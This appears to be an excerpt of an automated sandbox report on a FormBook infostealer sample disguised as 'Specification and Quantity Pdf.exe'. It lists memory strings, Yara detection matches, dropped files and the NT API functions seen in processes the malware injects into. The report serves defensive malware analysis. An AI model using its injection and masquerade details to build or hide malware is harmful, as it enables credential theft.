Source: explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: explorer.exe, 00000008.00000002.3757784608.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081808656.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/repX
Source: explorer.exe, 00000008.00000000.1337456269.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3762420609.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: rundll32.exe, 0000000A.00000002.3749703001.0000000000811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: rundll32.exe, 0000000A.00000002.3749703001.0000000000811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: rundll32.exe, 0000000A.00000002.3749703001.0000000000811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: rundll32.exe, 0000000A.00000002.3749703001.0000000000811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: rundll32.exe, 0000000A.00000002.3749703001.0000000000811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: rundll32.exe, 0000000A.00000002.3749703001.0000000000811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: rundll32.exe, 0000000A.00000003.1398319849.0000000005595000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000008.00000000.1337456269.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3762420609.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000008.00000000.1337456269.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3762420609.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000008.00000000.1323539837.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3074408098.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271985306.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3758469891.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 00000008.00000000.1337456269.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3762420609.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000008.00000002.3754644999.00000000071A4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.pollensense.com/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Detected FormBook malware

Source: C:\Windows\SysWOW64\rundll32.exe	Dropped file: C:\Users\user\AppData\Roaming\95N0Q4RA\95Nlogrv.ini			Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped file: C:\Users\user\AppData\Roaming\95N0Q4RA\95Nlogri.ini			Jump to dropped file

Malicious sample detected (through community Yara rule)

Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.3767102018.0000000010A5F000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Specification and Quantity Pdf.exe PID: 7692, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 7924, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: wmplayer.exe PID: 7956, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 8156, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041A330 NtCreateFile,	6_2_0041A330
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041A3E0 NtReadFile,	6_2_0041A3E0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041A460 NtClose,	6_2_0041A460
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041A510 NtAllocateVirtualMemory,	6_2_0041A510
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041A32B NtCreateFile,	6_2_0041A32B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041A45A NtClose,	6_2_0041A45A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041A50B NtAllocateVirtualMemory,	6_2_0041A50B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_03872BF0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872B60 NtClose,LdrInitializeThunk,	6_2_03872B60
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872AD0 NtReadFile,LdrInitializeThunk,	6_2_03872AD0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872F90 NtProtectVirtualMemory,LdrInitializeThunk,	6_2_03872F90
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872FB0 NtResumeThread,LdrInitializeThunk,	6_2_03872FB0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872FE0 NtCreateFile,LdrInitializeThunk,	6_2_03872FE0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872F30 NtCreateSection,LdrInitializeThunk,	6_2_03872F30
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_03872E80
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_03872EA0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872DD0 NtDelayExecution,LdrInitializeThunk,	6_2_03872DD0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_03872DF0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_03872D10
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_03872D30
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_03872CA0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_03872C70
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03874340 NtSetContextThread,	6_2_03874340
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03873090 NtSetValueKey,	6_2_03873090
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03873010 NtOpenDirectoryObject,	6_2_03873010
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03874650 NtSuspendThread,	6_2_03874650
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038735C0 NtCreateMutant,	6_2_038735C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872B80 NtQueryInformationFile,	6_2_03872B80
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872BA0 NtEnumerateValueKey,	6_2_03872BA0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872BE0 NtQueryValueKey,	6_2_03872BE0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872AB0 NtWaitForSingleObject,	6_2_03872AB0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872AF0 NtWriteFile,	6_2_03872AF0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038739B0 NtGetContextThread,	6_2_038739B0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872FA0 NtQuerySection,	6_2_03872FA0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872F60 NtCreateProcessEx,	6_2_03872F60
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872EE0 NtQueueApcThread,	6_2_03872EE0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872E30 NtWriteVirtualMemory,	6_2_03872E30
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872DB0 NtEnumerateKey,	6_2_03872DB0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872D00 NtSetInformationFile,	6_2_03872D00
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03873D10 NtOpenProcessToken,	6_2_03873D10
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03873D70 NtOpenThread,	6_2_03873D70
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872CC0 NtQueryVirtualMemory,	6_2_03872CC0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872CF0 NtOpenProcess,	6_2_03872CF0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872C00 NtQueryInformationProcess,	6_2_03872C00
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872C60 NtCreateKey,	6_2_03872C60
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03B5A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,	6_2_03B5A036
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03B5A042 NtQueryInformationProcess,	6_2_03B5A042
Source: C:\Windows\explorer.exe	Code function: 8_2_10A47232 NtCreateFile,NtReadFile,	8_2_10A47232
Source: C:\Windows\explorer.exe	Code function: 8_2_10A48E12 NtProtectVirtualMemory,	8_2_10A48E12
Source: C:\Windows\explorer.exe	Code function: 8_2_10A48E0A NtProtectVirtualMemory,	8_2_10A48E0A
